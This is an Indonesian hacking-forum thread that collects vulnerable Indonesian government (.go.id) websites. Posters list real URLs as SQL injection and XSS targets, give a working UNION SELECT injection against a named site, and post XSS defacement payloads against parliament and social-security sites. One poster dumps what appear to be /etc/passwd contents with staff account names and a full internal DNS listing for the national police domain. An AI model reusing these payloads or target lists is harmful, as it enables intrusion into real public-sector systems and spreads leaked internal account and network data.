Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

Kumpulan: WEB .GO.ID masuk sini.....

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

Kumpulan: WEB .GO.ID masuk sini.....

Postby RJ-45 » Mon Aug 16, 2010 3:07 am

bukan maksud tuk menyebarkannya moga ja da yang mau ngasih tahu admin webnya langsung....
pa lagi moga ja adminnya baca ini... om momod ma om mimin lo g setuju dengn thread ini silahkan di close...

Langsung aja
XSS dulu ja:
http://sikec.garutkab.go.id/index_mgf.php?cmd=pemilu_detail&idkec=ls%20-a&idperiode=1/2010&nm_kec=Hacked%20By%20:M4La1K4t_M1mPi1

VUL SQLI:
http://www.pemkomedan.go.id/gallery_detail.php?idx=98%27
http://www.dprdkutaikartanegara.go.id/galerifoto.php?id=77'
http://arsip.banten.go.id/sim.php?link=isi&id=3%27
http://pn-lubukbasung.go.id/index.php?menu=transparansi&kat=19%27
http://rsud.sragenkab.go.id/detail.php?id=30%27


Kemungkinan bisa SQLi (belom coba ane):
http://www.padangpariamankab.go.id/news.php?nid=1&cid=15%27
http://diskopukm.baliprov.go.id/?page_id=307%27
http://pariwisata.garutkab.go.id/index.php?mindex=daf_bumiperkemahan&page_num=&dd_group=1
http://ilmea.kemenperin.go.id/perpustakaan/detail.php?id=3703


Yang ini Kumpulan error:
http://dinhut.jatengprov.go.id/www/mod.php?mod=publisher&op=viewcat&cid=2
http://www.tegal.go.id/footer.php
http://rsud.sragenkab.go.id/gb.php?awal=13890%27
http://www.mojokertokota.go.id/koperasi/show_industri.php
http://www.dinpendikpkp.go.id/?page=list_tamu
http://www.kerincikab.go.id/Berita/detail/83/Stand_Pameran_Kerinci_Meriahkan_HUT_Propinsi_Jambi_Ke-53___/
http://www.nttprov.go.id/web/disnak/index.php?hal=1

MOga berguna..... :tapa: :tapa: :tapa: :tapa: :tapa:
RJ-45
 
Posts: 78
Joined: Thu Dec 17, 2009 2:29 pm

Re: Kumpulan: WEB .GO.ID masuk sini.....

Postby b0c4h » Mon Aug 16, 2010 5:36 am

numpang naro atu kk... :maaf:

Code: Select all
http://www.bakorkamla.go.id/news.php?id=-554%20union%20all%20select%201,version(),3,4,5,6,7--


.thx.
Love And Peace cannot Created without "RESPECT"
b0c4h
 
Posts: 193
Joined: Tue Aug 21, 2007 6:11 pm
Location: Jack

Re: Kumpulan: WEB .GO.ID masuk sini.....

Postby princenux » Mon Aug 16, 2010 3:15 pm

kalo prov.go.id
biasa nya emang agak2 rentan...

yah paling gak.. bisa di coba di extract information from dns..
biasa keliatan sih...

kalo SQLi... yah ada yg bisa ada yg gak... :D
princenux
 
Posts: 16
Joined: Wed Jul 28, 2010 1:36 pm

Re: Kumpulan: WEB .GO.ID masuk sini.....

Postby julipat » Mon Nov 22, 2010 5:28 am

Yg ini servernya Pak Polisi
monggo dinikmati:
proxy1 230.130.236.198 ----> bisa untuk sms
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
reskrimum:x:1000:1000:reskrimum,,,:/home/reskrimum:/bin/bash
bind:x:103:110::/var/cache/bind:/bin/false
messagebus:x:104:111::/var/run/dbus:/bin/false
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:106:114:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
cupsys:x:107:108::/home/cupsys:/bin/false
haldaemon:x:108:116:Hardware abstraction layer,,,:/home/haldaemon:/bin/false
hplip:x:109:7:HPLIP system user,,,:/var/run/hplip:/bin/false
gdm:x:110:119:Gnome Display Manager:/var/lib/gdm:/bin/false
mysql:x:111:120:MySQL Server,,,:/var/lib/mysql:/bin/false
proftpd:x:112:65534::/var/run/proftpd:/bin/false
ftp:x:113:65534::/home/ftp:/bin/false
postfix:x:114:121::/var/spool/postfix:/bin/false
sshd:x:115:65534::/var/run/sshd:/usr/sbin/nologin
dovecot:x:116:123:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
clamav:x:117:124::/var/lib/clamav:/bin/false
toni:x:1001:1002:Toni,,,:/home/toni:/bin/bash
irfan:x:1002:1003:ifankeren,,,:/home/irfan:/bin/bash
kasat-renakta:x:1003:1004:renakta,,,:/home/kasat-renakta:/bin/bash
kasat-kamneg:x:1004:1005:kamneg,,,:/home/kasat-kamneg:/bin/bash
kasat-harda:x:1005:1006:harda,,,:/home/kasat-harda:/bin/bash
kasat-jatanras:x:1006:1007:jatanras,,,:/home/kasat-jatanras:/bin/bash
kasat-resmob:x:1007:1008:resmob,,,:/home/kasat-resmob:/bin/bash
kasat-ranmor:x:1008:1009:ranmor,,,:/home/kasat-ranmor:/bin/bash
dir:x:1009:1010:direktur,,,:/home/dir:/bin/bash
wadir:x:1010:1011:wadir,,,:/home/wadir:/bin/bash
kabag-analis:x:1011:1012:analis,,,:/home/kabag-analis:/bin/bash
tornagogo:x:1012:1013:tornagogo,,,:/home/tornagogo:/bin/bash
info:x:1013:1014:Information,,,,:/home/info:/bin/bash
tamusap:x:1014:1015:tamusap,,,,:/home/tamusap:/bin/bash
hilman:x:1015:1016:Hilman,,,,:/home/hilman:/bin/bash
ppa:x:1016:1017:Unit PPA,Unit II,523-4333,:/home/ppa:/bin/bash
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin nobsaibot::100::/root:/bin/bash smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin pegasus:x:100:500:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash ogie:x:500:501:Joegisrijadi:/home/ogie:/bin/bash administrator:x:501:0::/home/administrator:/bin/sh
polri.go.id. 9200 IN SOA ns1.polri.go.id. root.polri.go.id. 2009031200 36000 14400 3600000 86400
polri.go.id. 9200 IN NS ns1.cepat.net.id.
polri.go.id. 9200 IN NS ns1.melsa.net.id.
polri.go.id. 9200 IN NS ns1.polri.go.id.
polri.go.id. 9200 IN MX 10 mx.polri.go.id.
polri.go.id. 9200 IN A 203.130.236.196
apache.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
astaro.polri.go.id. 9200 IN A 203.130.236.213
www.babinkam.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
bimmas.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
www.bimmas.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
binkar.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
binkum.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
www.binkum.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
brimob.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
www.brimob.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
data.polri.go.id. 9200 IN CNAME web1.polri.go.id.
dblinux.polri.go.id. 9200 IN A 203.130.236.218
dbpolri.polri.go.id. 9200 IN A 203.130.236.209
dev1.polri.go.id. 9200 IN A 203.130.236.221
www.dokkes.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
driver.polri.go.id. 9200 IN CNAME gtw.polri.go.id.
e-proc.polri.go.id. 9200 IN A 203.130.236.207
firewall.polri.go.id. 9200 IN CNAME box.polri.go.id.
homepage.polri.go.id. 9200 IN A 203.130.236.199
humas.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
www.humas.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
polri.go.id.polri.go.id. 9200 IN TXT “v=spf1 a mx ptr ~all”
ident.polri.go.id. 9200 IN CNAME its-oke.polri.go.id.
www.ident.polri.go.id. 9200 IN CNAME web1.polri.go.id.
intel.polri.go.id. 9200 IN CNAME homepage.polri.go.id.
irc.polri.go.id. 9200 IN A 203.130.236.215
ircd.polri.go.id. 9200 IN A 209.249.65.246
its-oke.polri.go.id. 9200 IN CNAME web1.polri.go.id.
jatim.polri.go.id. 9200 IN A 203.161.30.5
javascripts.polri.go.id. 9200 IN CNAME homepage.polri.go.id.
lantas.polri.go.id. 9200 IN A 222.124.12.44
mail.lantas.polri.go.id. 9200 IN A 222.124.12.45
mail.lantas.polri.go.id. 9200 IN MX 10 mail.sanpol.polri.go.id.
www.lantas.polri.go.id. 9200 IN CNAME lantas.polri.go.id.
mail.polri.go.id. 9200 IN A 203.130.236.201
www.media.polri.go.id. 9200 IN CNAME media.polri.go.id.
monitoring.polri.go.id. 9200 IN A 203.130.236.206
mrtg.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
mulmed.polri.go.id. 9200 IN A 203.130.236.220
mx.polri.go.id. 9200 IN A 203.130.236.205
mysql.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
www.mysql.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
nad.polri.go.id. 9200 IN A 125.160.17.201
www.nad.polri.go.id. 9200 IN CNAME nad.polri.go.id.
ncic.polri.go.id. 9200 IN A 203.130.236.197
ns1.polri.go.id. 9200 IN A 203.130.236.196
ns2.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
ogie.polri.go.id. 9200 IN CNAME duksistek.polri.go.id.
papua.polri.go.id. 9200 IN A 118.97.26.214
php.polri.go.id. 9200 IN CNAME homepage.polri.go.id.
polmail.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
polribaru.polri.go.id. 9200 IN CNAME homepage.polri.go.id.
pop.polri.go.id. 9200 IN CNAME mail.polri.go.id.
proxy.polri.go.id. 9200 IN CNAME proxy2.polri.go.id.
proxy1.polri.go.id. 9200 IN A 203.130.236.198
proxy2.polri.go.id. 9200 IN A 203.130.236.212
ptik.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
www.digilib.ptik.polri.go.id. 9200 IN CNAME web3.polri.go.id.
www.ptik.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
pusdikreskrim.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
www.pusdikreskrim.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
pusdokkes.polri.go.id. 9200 IN A 203.77.225.20
pusdokkes.polri.go.id. 9200 IN MX 10 mail.pusdokkes.polri.go.id.
mail.pusdokkes.polri.go.id. 9200 IN A 202.158.0.20
mail.pusdokkes.polri.go.id. 9200 IN MX 10 mail.lantas.polri.go.id.
www.pusdokkes.polri.go.id. 9200 IN CNAME pusdokkes.polri.go.id.
pusinfolahta.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
www.samapta.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
sanpol.polri.go.id. 9200 IN A 203.130.232.138
mail.sanpol.polri.go.id. 9200 IN A 203.130.232.138
www.sanpol.polri.go.id. 9200 IN CNAME sanpol.polri.go.id.
service.polri.go.id. 9200 IN CNAME web2.polri.go.id.
sespim.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
www.sespim.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
sms.polri.go.id. 9200 IN A 203.130.236.195
sms1120.polri.go.id. 9200 IN A 203.130.236.216
smtp.polri.go.id. 9200 IN CNAME mail.polri.go.id.
software.polri.go.id. 9200 IN A 203.130.236.222
spam.polri.go.id. 9200 IN CNAME mx.polri.go.id.
sul.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
www.sul.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
testwww.polri.go.id. 9200 IN CNAME gtw.polri.go.id.
usermail.polri.go.id. 9200 IN CNAME dblinux.polri.go.id.
web1.polri.go.id. 9200 IN A 203.130.236.200
web3.polri.go.id. 9200 IN A 203.130.236.219
web4.polri.go.id. 9200 IN CNAME gtw2.polri.go.id.
weblinux.polri.go.id. 9200 IN A 203.130.236.211
webmail.polri.go.id. 9200 IN CNAME weblinux.polri.go.id.
webuser.polri.go.id. 9200 IN CNAME dblinux.polri.go.id.
www.polri.go.id. 9200 IN CNAME homepage.polri.go.id.
xjateng.polri.go.id. 9200 IN CNAME dev1.polri.go.id.
www.xjateng.polri.go.id. 9200 IN CNAME dev1.polri.go.id.
xpolri.polri.go.id. 9200 IN A 203.130.236.217

to be continue server BIN & LSN....
julipat
 
Posts: 2
Joined: Mon Nov 22, 2010 5:16 am

Re: Kumpulan: WEB .GO.ID masuk sini.....

Postby julipat » Mon Nov 22, 2010 5:32 am

[b]230.130.236.198 ----> MASIH BISA DIGUNAKAN UNTUK SMS[/b]
julipat
 
Posts: 2
Joined: Mon Nov 22, 2010 5:16 am

Re: Kumpulan: WEB .GO.ID masuk sini.....

Postby demonbrando » Mon Nov 22, 2010 1:19 pm

hati" om jgn maen" dengan polisi,tar bahaya... :kaca: :kaca:
jalani hidup ini dengan santai tapi jangan lupa ibadah..
User avatar
demonbrando
 
Posts: 342
Joined: Thu Oct 15, 2009 12:49 am

Re: Kumpulan: WEB .GO.ID masuk sini.....

Postby agoessangpencari » Mon Nov 22, 2010 2:41 pm

Mksdnya apa y om yang tentang web polri td??makenya dmn om?
agoessangpencari
 
Posts: 2
Joined: Sat Nov 13, 2010 12:06 pm

Re: Kumpulan: WEB .GO.ID masuk sini.....

Postby cribes » Sun Jul 26, 2015 10:16 pm

ijin absen ahhh
Code: Select all
http://mpr.go.id/search?s=%3Ch1%3Ez3r0p4in%20was%20here%3C/h1%3E%3Cbr%3E%3Cimg+src%3D%22http://meme.indotop10.com/content/uploads//images/March2015/para-koruptor.jpg%22%3E
cribes
 
Posts: 6
Joined: Wed May 24, 2006 7:42 am

Re: Kumpulan: WEB .GO.ID masuk sini.....

Postby cribes » Sun Jul 26, 2015 10:18 pm

ijin absen ahhh
Code: Select all
http://mpr.go.id/search?s=%3Ch1%3Ez3r0p4in%20was%20here%3C/h1%3E%3Cbr%3E%3Cimg+src%3D%22http://meme.indotop10.com/content/uploads//images/March2015/para-koruptor.jpg%22%3E
cribes
 
Posts: 6
Joined: Wed May 24, 2006 7:42 am

Re: Kumpulan: WEB .GO.ID masuk sini.....

Postby cribes » Sun Jul 26, 2015 10:34 pm

Code: Select all
http://www.bpjsketenagakerjaan.go.id/?f=%3Ch1%3Ez3r0p4in%20was%20here%3C/h1%3E%3Ch2%3E+ngabisiin+duit+rakyat+ajaa+dasar+pencuri+%3Cbr%3E+%3Cimg+src%3D%22http://meme.indotop10.com/content/uploads//images/March2015/para-koruptor.jpg%22%3E
cribes
 
Posts: 6
Joined: Wed May 24, 2006 7:42 am

leave a comment

Next

Return to Web Hacking

Who is online

Users browsing this forum: Bing [Bot], Yahoo [Bot] and 15 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id